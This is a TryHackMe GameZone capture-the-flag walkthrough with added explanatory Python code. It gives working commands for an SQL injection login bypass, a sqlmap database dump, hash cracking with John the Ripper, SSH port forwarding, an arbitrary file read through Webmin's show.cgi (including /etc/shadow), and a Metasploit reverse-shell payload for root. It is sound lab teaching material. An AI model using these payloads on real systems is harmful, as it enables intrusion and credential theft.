TryHackMe - GameZone

Eng Saif
Feb 26, 2021

1.Scanning

An nmap scan shows two open ports:

1. SSH (22), 2. HTTP (80)

Because we don't have any usernames yet, brute forcing or logging in over SSH is not an option at this stage, so we start with the web server.

2.Enumeration

A. Open the web page and notice that it contains a login form.

# A login form is the classic place to test for SQL injection: the username and password are often dropped straight into the query

B. Additional: hydra can brute force this login form, but without a valid username it won't get anywhere here:

hydra -l admin -P passlist.txt 10.10.10.10 http-post-form "/index.php:username=^USER^&password=^PASS^&x=22&y=16:Incorrect Login" -f

# the text after the last colon is the failure message hydra looks for in the response; -f stops at the first working pair

Instead we use manual SQL injection in the username field (the password can be anything).

The injection payload for the username field is:

' OR 1=1 -- -

# the quote closes the username string, OR 1=1 makes the WHERE clause true for every row, and -- - comments out the rest of the query (the trailing dash keeps the space that MySQL requires after --, even if the application trims the input)
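To see exactly why that payload logs us in, here is an added example (not code from the walkthrough or from the GameZone box) that runs the same login check two ways against a constructed in-memory SQLite table. The user names and passwords are made up; SQLite is used because it ships with Python and its `--` comment works like MySQL's, which is enough to show the bypass and the parameterised fix side by side.

```python
import sqlite3

# Constructed stand-in for the login backend: a tiny in-memory users table.
# The names and passwords are made up for this example.
USERS = [("alice", "s3cret"), ("bob", "hunter2")]

# The payload from the walkthrough. The quote closes the username string,
# OR 1=1 makes the WHERE clause true for every row, and "-- -" comments out
# the rest of the statement (the trailing dash keeps the space MySQL needs
# after "--" even if the application trims the input).
PAYLOAD = "' OR 1=1 -- -"


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    con.commit()
    return con


def login_vulnerable(con, username, password):
    """Builds the query by string concatenation, so the input is parsed as SQL.
    Returns the username the application would treat as logged in."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND pwd = '{password}'")
    row = con.execute(query).fetchone()  # first matching row wins
    return row[0] if row else None


def login_safe(con, username, password):
    """Same check with a parameterised query: the payload is compared as a
    literal string and never reaches the SQL parser."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND pwd = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))  # alice
    print("safe:      ", login_safe(db, PAYLOAD, "anything"))        # None
```

With the string-built query the payload turns the WHERE clause into `username = '' OR 1=1`, every row matches, and the application takes the first one (the first user in the table, which on many apps is the admin). With the bound parameters the same string is just a username nobody has.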

C. After logging in we land on another page with a search form. Now we use sqlmap on that search request to dump the database.

We use Burp's intercept to capture the search request and save it to a file for sqlmap:

sqlmap -r request.txt --dbms=mysql --dump

# -r uses the intercepted request you saved earlier (method, cookies and parameters included)

# --dbms tells sqlmap what type of database management system it is, so it skips testing the others

# --dump attempts to output the entire database (tables, columns and rows)

D. The dump gives us a username and a SHA-256 password hash. A hash can't be decrypted; we crack it by hashing wordlist candidates and comparing, either with a lookup site such as md5decrypt.net/en/Sha256 or with John the Ripper:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256

# Raw-SHA256 means plain, unsalted SHA-256, which is why a single wordlist pass is enough
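What john does with --format=Raw-SHA256 is simple enough to write out. The following is an added example (not from the walkthrough or from john itself) that runs a wordlist attack against one or more raw SHA-256 digests. The wordlist and the target digest are constructed here; in practice the digests come from the sqlmap dump and the words from rockyou.txt.

```python
import hashlib
from typing import Dict, Iterable

# Constructed wordlist standing in for rockyou.txt; the real list has
# millions of entries. "dragon" is the word we plant a hash for below.
WORDLIST = ["123456", "password", "letmein", "dragon", "qwerty"]


def sha256_hex(word: str) -> str:
    return hashlib.sha256(word.encode("utf-8")).hexdigest()


def load_wordlist(path: str) -> Iterable[str]:
    """Stream a wordlist line by line. rockyou.txt contains bytes that are
    not valid UTF-8, so decode leniently instead of crashing part-way."""
    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
        for line in fh:
            yield line.rstrip("\r\n")


def crack_raw_sha256(targets: Iterable[str], wordlist: Iterable[str]) -> Dict[str, str]:
    """One pass over the wordlist for any number of hashes, the same idea as
    john --format=Raw-SHA256: hash each candidate once and look it up in the
    set of wanted digests. Returns {digest: password} for the ones found."""
    wanted = {t.strip().lower() for t in targets}  # dumps vary in letter case
    found: Dict[str, str] = {}
    for word in wordlist:
        digest = sha256_hex(word)
        if digest in wanted:
            found[digest] = word
            if len(found) == len(wanted):
                break  # nothing left to crack
    return found


# Constructed target: in the real engagement this digest is the value
# sqlmap dumped from the users table.
TARGET = sha256_hex("dragon")

if __name__ == "__main__":
    print(crack_raw_sha256([TARGET], WORDLIST))  # -> {TARGET: 'dragon'}
```

Two things the code makes visible: the attack only needs one hash computation per candidate because the digests are unsalted (a salted, slow hash such as bcrypt would force one run per user and per salt, and far fewer guesses per second), and normalising case and whitespace on the targets avoids silently missing a hash that the dump printed in uppercase.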

E. Log in over SSH with the cracked username and password.

3.Tunneling

F. List the services running on the victim machine with the ss tool.

G. ss -tulpn shows the listening TCP and UDP sockets, the address each one is bound to, and the owning process:

ss -tulpn

We notice that port 10000 is bound to localhost only, so it can't be reached from our browser directly; we have to tunnel to it.

H. SSH can forward that port to our machine with local port forwarding (-L):

ssh -L 10000:localhost:10000 user@10.10.10.10

# the format is local_port:destination_host:destination_port, and destination_host is resolved on the victim, so localhost here means the victim's loopback

Now the service is reachable from our own machine at localhost:10000.
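The decision in this step is "which listeners are loopback-only and therefore need a tunnel". Below is an added example (not part of the walkthrough) that parses ss -tulpn output, keeps only the ports bound exclusively to a loopback address, and builds the matching ssh -L command. The ss output is constructed for the example and is not a capture from the GameZone box; the extra port 8000 is included only to show that several loopback services can be forwarded in one ssh invocation.

```python
from typing import Dict, List, Optional, Set, Tuple

# Constructed ss -tulpn output (not a capture from the box). The column
# layout follows iproute2's default header:
# Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp   LISTEN 0      128    0.0.0.0:22         0.0.0.0:*
tcp   LISTEN 0      128    127.0.0.1:10000    0.0.0.0:*
tcp   LISTEN 0      80     127.0.0.1:8000     0.0.0.0:*
tcp   LISTEN 0      128    *:80               *:*
udp   UNCONN 0      0      127.0.0.1:10000    0.0.0.0:*
tcp   LISTEN 0      128    [::1]:10000        [::]:*
"""

LOOPBACK = {"127.0.0.1", "[::1]", "::1"}


def split_addr_port(local: str) -> Tuple[str, Optional[int]]:
    """'127.0.0.1:10000' -> ('127.0.0.1', 10000); '[::1]:10000' -> ('[::1]', 10000).
    rpartition handles IPv6 addresses, which contain colons themselves."""
    host, _, port = local.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def loopback_only_ports(ss_text: str) -> List[int]:
    """Ports that are bound to loopback addresses only. A port that is also
    bound to 0.0.0.0, * or [::] is reachable from outside and is left out,
    so the result is exactly the set that needs an SSH tunnel."""
    binds: Dict[int, Set[str]] = {}
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] not in ("tcp", "udp"):
            continue  # header or unexpected line
        host, port = split_addr_port(fields[4])
        if port is None:
            continue
        binds.setdefault(port, set()).add(host)
    return sorted(p for p, hosts in binds.items() if hosts <= LOOPBACK)


def ssh_forward_command(user: str, host: str, ports: List[int]) -> str:
    """One ssh command with a -L flag per loopback-only port, mapping each
    victim port to the same number on our side."""
    flags = " ".join(f"-L {p}:localhost:{p}" for p in ports)
    return f"ssh {flags} {user}@{host}"


if __name__ == "__main__":
    ports = loopback_only_ports(SS_OUTPUT)
    print(ports)                                          # [8000, 10000]
    print(ssh_forward_command("user", "10.10.10.10", ports))
```

Port 22 and 80 are bound to all interfaces and are dropped; 10000 shows up three times (TCP v4, UDP v4 and TCP v6) but every bind is loopback, so it is kept once. With only port 10000 in the list the function returns the exact command used above.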

4.Privilege Escalation

I. Now we use this web server for privilege escalation and to get the root flag.

J. The service on port 10000 is Webmin v1.580. Searching for that version shows that its show.cgi script runs as root and can be abused to read arbitrary files, and that there is also a Metasploit exploit for it that gives us a shell.

1. We can read files through this vulnerability by appending /file/show.cgi/xxxx to the URL

# xxxx is the absolute path of any file we want to read

For example, we can view the passwd file by browsing to localhost:10000/file/show.cgi/etc/passwd

or localhost:10000/file/show.cgi/etc/shadow to see the root user's hash (readable only because show.cgi runs as root)

Then we save both as text files and combine them with unshadow, which copies the hashes from shadow into the password field of the passwd lines, the format john expects:

unshadow passwd.txt shadow.txt > passwords.txt

then run john on the new file:

john --wordlist=/usr/../rockyou.txt passwords.txt
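To make clear what unshadow actually produces (and why john needs it), here is an added example, not the unshadow tool's own code, that merges constructed /etc/passwd and /etc/shadow excerpts the same way and then filters out the accounts that have no crackable hash. The hash strings are fake placeholders, not real credentials.

```python
from typing import Dict, List

# Constructed /etc/passwd and /etc/shadow excerpts. The hashes are fake
# placeholders in the $6$salt$hash shape, not real credentials.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
"""

SHADOW = """\
root:$6$saltsalt$FAKEROOTHASH:18600:0:99999:7:::
daemon:*:18600:0:99999:7:::
alice:$6$othersalt$FAKEUSERHASH:18600:0:99999:7:::
"""


def parse_shadow(text: str) -> Dict[str, str]:
    """Map username -> password field from shadow, skipping blank/comment lines."""
    hashes: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]
    return hashes


def unshadow(passwd_text: str, shadow_text: str) -> List[str]:
    """Reproduce what the unshadow tool does: replace the 'x' in the second
    field of each passwd line with the matching hash from shadow, keeping the
    rest of the line (uid, gid, home, shell) for john's output."""
    shadow = parse_shadow(shadow_text)
    merged: List[str] = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed passwd line, leave it out
        fields[1] = shadow.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def crackable(merged_lines: List[str]) -> List[str]:
    """Drop locked or passwordless accounts ('*', '!', '!!', empty, or an
    'x' with no shadow entry) so john spends its time only on real hashes."""
    keep: List[str] = []
    for line in merged_lines:
        pw = line.split(":")[1]
        if pw in ("", "*", "x") or pw.startswith("!"):
            continue
        keep.append(line)
    return keep


if __name__ == "__main__":
    for line in crackable(unshadow(PASSWD, SHADOW)):
        print(line)
```

The merged root line reads `root:$6$saltsalt$FAKEROOTHASH:0:0:root:/root:/bin/bash`; daemon is dropped by the filter because `*` is not a hash. Cracking the remaining $6$ (sha512crypt) entries is left to john, which is much slower per guess than the raw SHA-256 run above because each candidate is salted and iterated.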

2. Or we read the flag directly by browsing to localhost:10000/file/show.cgi/root/root.txt

K. Using Metasploit to get a shell

1. use exploit/unix/webapp/webmin_show_cgi_exec

2. set the options (the target is the tunnelled port, so the host is our own localhost):

set RHOST localhost

set SSL false

set USERNAME <cracked username>

set PASSWORD <cracked password>

set PAYLOAD cmd/unix/reverse

set LHOST <your tun0 ip>

set LPORT <your listening port>

exploit

# the module logs in with the cracked credentials and runs the payload through show.cgi, which executes as root

Written By Eng.Saif (eng.saif@protonmail.com)
